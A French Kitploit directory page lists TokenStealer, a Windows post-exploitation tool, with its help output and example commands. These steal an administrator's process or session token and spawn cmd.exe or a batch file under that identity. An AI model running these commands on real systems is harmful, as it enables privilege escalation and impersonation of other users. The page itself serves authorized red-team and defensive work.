Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
TokenStealer — Utilitaire de manipulation de jetons Windows qui répertorie, vole et usurpe les jetons de processus ou d'utilisateur afin d'exécuter des commandes sous l'identité d'autres utilisateurs, en exploitant les privilèges SeImpersonate et SeAssignPrimary. | Kitploit
Outils/GitHubGitHub/decoder-it/tokenstealer
Escalade de PrivilègesOutils d'ImpersonationPost-ExploitationRed Teaming
GitHubdecoder-it/tokenstealer

TokenStealer

Utilitaire de manipulation de jetons Windows qui répertorie, vole et usurpe les jetons de processus ou d'utilisateur afin d'exécuter des commandes sous l'identité d'autres utilisateurs, en exploitant les privilèges SeImpersonate et SeAssignPrimary.

Voir le dépôt
165286il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

TokenStealer

Un outil simple que j'ai écrit il y a quelque temps pour voler et jouer avec les jetons Windows.
Certaines parties du code ont été reprises et adaptées depuis https://github.com/FSecureLABS/incognito
Clairement, vous aurez besoin des privilèges Impersonation ou AssignPrimary et du privilège Debug pour accéder à tous les processus.
En règle générale, vous exécuteriez l'outil avec les privilèges locaux les plus élevés, comme SYSTEM.

root@kitploit:~
TokenStealer.exe
[+] My personal simple and stupid  Token Stealer... ;)
[+] v1.0 @decoder_it 2023

[!] Usage:
         -l: list all user's token
         -e: list all user's token with extended info -> [user]:[token_level (2)=Impersonation, (3)=Delegation,(P)=Primary>]:[pid]:[SessionId]
         -p: <pid> list/steal  token from specfic  process pid
         -u: <user> list/steal token of user
         -c: <command> command to execute with token 
         -t: force use of impersonation Privilege 
         -b: <token level> needed token type: 1=Primary,2=Impersonation,3=Delegation 
         -s: <SessionId> list/steal token from specific Session ID

=Examples=

TokenStealer.exe -e -b 1 
-> list all primary tokens

TokenStealer.exe -l -p 100
-> list all tokens in process pid 100

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\cmd.exe
-> steal token of the user and execute an interactive  command shell using the AssingPrimary privilege if available

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\bind.bat  -p 100 -t
-> steal token of the user in process 100 and execute the batch file using Impersonation privilege instead of AssingPrimary

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\cmd.exe -b 1
-> steal a primary token of the user and execute an interactive  command shell using the AssingPrimary privilege if available

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\cmd.exe -s 2
-> steal a token of the user in specific SessionID and execute an interactive  command shell using the AssingPrimary privilege if available

Texte alternatif
Télécharger l’outil